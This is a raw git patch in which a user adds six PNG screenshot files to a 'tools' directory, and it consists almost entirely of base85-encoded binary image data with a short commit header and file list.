zr21@4x_`vPhOs^Iup=26shXG(=jcp$P4Cf z2cYvu*K;2&_gW<-Bc$Mnx7#U?J&^M`&Fn_@mR@*7s$1P++oF_?Q#|%Af+s2DWe~=2 zIkg5{2(+=8G$AYIly_Or=P$5Ra>COe&xCK|+T*d`XR(B-@hS81v=UuMqH4!6OSN3} z#+h5{3=s-mU<~fQ{H9HYn~s&}o0^8!0(=!XPhlTtJKf|qzn_}>)V_3)+p;CSVwQ&c z!1c%`y%S%z^O(T`yBsniU$P_)wPD0K=rENQryGtctc^7U<&{Ja;#3T596FtfuFF~f zJx}MztR@5e=~DD~c;4zyz^8MhpBpnV)H;9^4lt=oDCnbg3DNm5aQ*=F1d+Hz8q>yK z*bWv|K}?F%1P!k)&^IHX*Eu&;)g{B+vdbc18YWe*bM49Em^?w9F_=k`1TyD1Zc`Sy zk5~-%Tr)V(Er_k&7lufVz-s^)$@u4=&+4f(JpiJtC;hHJw@HU`x4Zknpj-318^|J znwlAwQ{}~rQbUslV5VdUiI_-EAz?BM=xXVVAWrcf9Nmk(0PRqwSD-2K{V7*ORxZR+W-$vou{O)1IMl zc6sq|7U0iqsM?S)IO<-n>rY$7uT#NvSI+us?CxxkD3@Cw7yr&ai;Y=mJ9Yp(1@fPQ zNv;mn`_Aj`w5Dn#IdM*`g}wFB2uLlIVf2a1wihnQImCGjeGqA3GN%#wLw?!^TE*v3 z;3BVs;GqwEwRJJ3T%;ht-| z7OrS4Qh#%nAh;M+Faf6#Buh73EgI8dtH^nA6mV*Is2K>41ZCp=?@Z>Ftekp#e;!Pj ztWV$Zwqt(6m@ zS_2lv$5}H!E9<%XVL)0to~(&H{`x18sHJGm{7>45dhWeP#Ul+e*^Zh2P8;ve(b{i^A4h;m@3yJ zyJ2lIH3BTzGXW0}OI$p>)2NOw!j)r9Y-Qsk9t_zqY^yT@B!dYtcno%sOVTshq1E}Q z1YI!Sb9kP(4OR zV9SrUspJ_T5R)UI@)M*wOEblTF!Ia1y z2*4_xNo=iiX@9zsfIws~u`K=da{~|t_&|s6p>iTK9xyU2XZxd~1=B+x5I-FiicUar zE2F;!MQkPhOfDjaP6b)~G5Q6ze!jZwhB@L07KSp=71`ltrWXEd{6T;gsix7CZ~^t` zP2mybxq z24<>#x`7^yTHaAr+Nxz!*OI9hcn5EHlBvO=cw#t45WXR>o9}>tF9j1wsLM#sMtv!u z?*m^C*xEt61P0(4BFds)vm`1BIfv6d^~0eB2~WTsK_9X9pS*1j!;3!y9=lpGw1c+y zSC%uuvS!2qUF*55D>(RF7~$c-2g*)`<-9Ou`(yI|`R9sJ8XQkYi;7-+B+LT=app-h zXQE))-ZfgN_5%eeaK>x0uPZMvmp`U-mC@sdCzhRRUmWQ>x*3>JIrR^DQ|Kd)=aUiR z|A2Y4Q47|A?yh^Q#l{l~ny+{sn~pgmRa$k%G5<3PelZyF7bwW&SOCDv)0@rG#XHd= zcw4z*Au_CSN5>W&(50A0_3>8_7MLhlXpPy!%Gc_v>_+3MR!NJm@jTh3tX$pcz}p$d`jbXHC-oxPfLXzS z@Ct>d1&ks{(KNhBXLIz}F&geFLH{u9QG#6|K_mo!>^(4JSrocw97$LSgap8b@i?V{ z5iu!ppT@bath-G{XrAr^3GYOyee=;veT*s)+?siXdnSIwEd#OvWHN%(uJAC$P1p;% z3s>?=U3XA%YXv&ERu{F_-d+w&jyarO71^zQCZ&SV#1Ahi5-*8>h1aB62+dWjNmVFk)bI~|mXRH|sCYO|{pP3F&-@~mmW{T1 z9X!O~#TbHj`97eA&91xS{y?%wIsE8Lyf4bGYZLE$K(wauD@_6a`79AX7T)-x(o&Qk zqY_(}n4J7L)|~#T^n64lOv(Q%HM^V*)C?ftR69Wa_i&9yBxunerjz5Obp|VLczE2X z3q#0k9Cl+_E}gjeV<~ibDwOi!^btO6MSZg6k278hOa((K%Sn5&jJ@9aeDP zi6a!J`!m)85#uxFUrTFZI*a82oZJxx2r}}mA;x%=8w=KAtc^@?9Ww={2vQqPSuE0N zJTQLfAFFVP<^5Wj>c=lB+wQPVsH|m!I`P=~8p8uX*k~(r%<57a4$jJGGGkDywGmv8Y%z;1hm8tm%g*~uOhTY5{q+_MY0z&S!_>o4)fENJ zCag=qaAH5~7NRASD?iOx_lF+Ao!^g+rvoVUEiIp1j7I?xjH)kM;k3}yZefNl%bfZd z1u^#1Go^$E)+ahyxb{$idf~l_udI#w$RJaaV68MI)pV%bmmz9&1_q2*Gn)OkGBhp+ zYT}DmZ{1plQE<5p7@n&)Y$*HRVdI|3mk}_~0_da4NfKZI9@z-MDMuxVDJoG_Zd)Dt zC#}KR8i08lvL4|;q!u(zllL;H{^Osffq2Q7cJ{#1J;5vu(@vD%)i7;%*0ss1<*+t; zn>=eJKR&RFVXG`gVbv>Gwd!d{Fd0Ka`r+tq`vwV2_dn8tGXKx$s(HG=~OUIkj`R)CO9Vy#yy`YLeOq7O9Lmp-~+{wqbP zMUCrj!NpD_&)>Bcx@}-~{pnll^r(nF3Ve^(50inRg znuEOYT(v^a4uK-|v=l$|;=+tCS+;-CX@i-Va^`skYAvLbKX;ydhCv;Dxc~j1d%u5# z1A@Q|L7nf>{v{Hoc{mCyd13OCGBF9(0l}jx==2CmOSpv@?3Df>xjq z1v~qGPu}E&+_lp)QQV9*$Div1&USy>(>-_)S^^Lka&B{0^6!Y@;&`31Sm>4~(P_Rg zXG4NzFmKd&nhxiFd5WNZwxDI$uJ`X|c{Lr@JkS)@VzNgztYBhljN8wjfXk3PidF;? zcW9(|DRzd0eFTUwRLf^V*}R{7`9G(5@)>>T8feg76P^~jb{CY>gYD0>0qyc3iU9c% zd^$4FB={~WdyrZ@b3F5#7{9gNo*yY9GPhr6`!=KB{y}_}B7G(@a>x4jlIa=Jc_pUg zp5E*WmN-mRYJ)twa?3a^&RKaNb2==%=ewbNq9PEIsXGLt<_bwuNb}R{>gRbt#-=J6 zAO;R;4KZX?hk1?V`6cpR38Za9uqV?xg1iR~aV)YZq*nl>ZnoY$o%9Bk1c3ofn%{T8 zATpt)0FaF`cDG<$Z%%})kxq5*c(u&iRwzI_S7NZk0a-8};vYs+Y!=X=_fNZOVe$yT4u z)n=AAd{)cMT(bOMKeol#BwYIIJNJ4TG}e##Zq;RUg zEg7&ce`nb0{Vr4x9m6w%H*{pzb<;(rzv$!FcX^Tc;YA23m8UE}lE%^ltGJ0pTmKJc z+5i6+`~T?~{+~Y@&5jTQzhQ@3t#`>W6hafYK%D{L%?+i@i{PeQA=C(F1hCrg*! z%NFm+9Stp?KmCJ6a`jsmGkw-?sJ589sFSm56VJ&qB0&gZ}0w_lZJsVM15w4#B`XBHFn#qP9CvG#n z{pmJBSp@?SQ?kx)4+Lh8jao}=Y<)Ygr;)g@d;zGJX=in zHWrxIiCMJ1dp3KcW7_xDR=lWIAH&I)H+T>B*U?6`)T3E#K0=?WL2(wNdwTRGB9c0v zNeIR0ya@eLYf`9%30cUO3zq4}-gx`E#*qAcBL4tqimhv1)iTg0>6Pht*D_4(u0qq~ zjh^lbvl|m{PLB&VebxExW|Okj*moO+4l;uHmoOrwtE%v|xoTQ(5}V4@6?0RlwN0Ns)_3i4bh_wUNB zYpv0AesJf2jLl*#Ztw7Q>9NTR3~kOX7xk_?nigrhcc`+}@)u6OBQM%sxn>zd&fU%2 zBLx@=nn2ZXs^u5@Cz{SHK)jTf=i}!^9()`)6sS(o(cJJJF18|MtJE?>ceY8iz?WIi zmwVH+WN3Rz=Ag{I;@}OP4}*R9b@O+17VoDVM1p) zr^@$UXSvMxth7IA|3lE=4Z&5Z3gjgvY&aN)Li^3Z1>`-NNbOvHbVBI7Tt)BB`;Z=2 z!^`J&`Z5AquD1+Uob~(T4>f^nmx>#|{MwfByt&d(hmvi$QHhC3+VP=wD^<%z*zY^k zvtMG}`DHn+JmgJTb-bN>$l`oDGn From fcfe04c9cff298008294971a9cb065c25dfc13b5 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 01:02:17 +0100 Subject: [PATCH 099/214] Add files via upload --- tools/screenshot2.png | Bin 0 -> 112879 bytes tools/screenshot3.5.png | Bin 0 -> 123174 bytes tools/screenshot3.png | Bin 0 -> 127091 bytes tools/screenshot5.png | Bin 0 -> 46248 bytes tools/screenshot6.png | Bin 0 -> 54475 bytes tools/screenshot7.png | Bin 0 -> 60611 bytes 6 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 tools/screenshot2.png create mode 100644 tools/screenshot3.5.png create mode 100644 tools/screenshot3.png create mode 100644 tools/screenshot5.png create mode 100644 tools/screenshot6.png create mode 100644 tools/screenshot7.png diff --git a/tools/screenshot2.png b/tools/screenshot2.png new file mode 100644 index 0000000000000000000000000000000000000000..1a401ae544f2e15cddeee3a48b7b3d23230900af GIT binary patch literal 112879 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 